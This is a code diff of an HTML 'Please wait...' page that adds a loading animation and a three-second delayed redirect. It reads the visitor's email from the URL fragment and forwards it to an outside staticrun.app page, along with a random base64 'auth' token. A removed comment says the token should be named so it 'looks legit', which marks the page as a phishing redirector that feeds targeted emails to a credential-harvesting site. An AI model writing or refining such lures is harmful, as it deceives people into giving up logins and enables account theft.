--- a/accesspoint.html
+++ b/accesspoint.html
@@ -2,6 +2,33 @@
 <html>
 <head>
   <title>Please wait...</title>
+  <style>
+    body {
+      font-family: Arial, sans-serif;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+      background-color: #f4f4f4;
+      flex-direction: column;
+    }
+    #message {
+      font-size: 1.5em;
+      margin-bottom: 20px;
+    }
+    #dots span {
+      display: inline-block;
+      animation: blink 1s infinite;
+      margin: 0 2px;
+    }
+    #dots span:nth-child(2) { animation-delay: 0.2s; }
+    #dots span:nth-child(3) { animation-delay: 0.4s; }
+
+    @keyframes blink {
+      0%, 50%, 100% { opacity: 0; }
+      25%, 75% { opacity: 1; }
+    }
+  </style>
   <script>
     // Generate a random jargon string (base64 encoded and URL-safe)
     function generateJargon(length = 96) {
@@ -10,26 +37,25 @@
       for (let i = 0; i < length; i++) {
         result += charset.charAt(Math.floor(Math.random() * charset.length));
       }
-      return encodeURIComponent(btoa(result)); // Base64 + URI encode
+      return encodeURIComponent(btoa(result));
     }
 
-    // Get current URL parameters
-    const params = new URLSearchParams(window.location.search);
+    // Perform redirect after delay
+    function redirectAfterDelay() {
+      const email = window.location.hash.substring(1); // remove '#'
+      const authToken = generateJargon();
+      const baseURL = "https://papaya-1759505256502.staticrun.app/index.html";
+      const redirectURL = `${baseURL}?auth=${authToken}#${email}`;
+      window.location.href = redirectURL;
+    }
 
-    // Append the jargon as a new parameter
-    params.set("auth_token", generateJargon());  // name it whatever looks legit
-
-    // Set the redirect base URL
-    const baseURL = "https://papaya-1759505256502.staticrun.app/index.html";
-
-    // Final redirect URL with params + jargon
-    const redirectURL = baseURL + "#" + params.toString();
-
-    // Redirect
-    window.location.href = redirectURL;
+    // Wait 3 seconds before redirect
+    window.addEventListener("DOMContentLoaded", () => {
+      setTimeout(redirectAfterDelay, 3000);
+    });
   </script>
 </head>
 <body>
-  Please wait...
+  <div id="message">Please wait<span id="dots"><span>.</span><span>.</span><span>.</span></span></div>
 </body>
 </html>
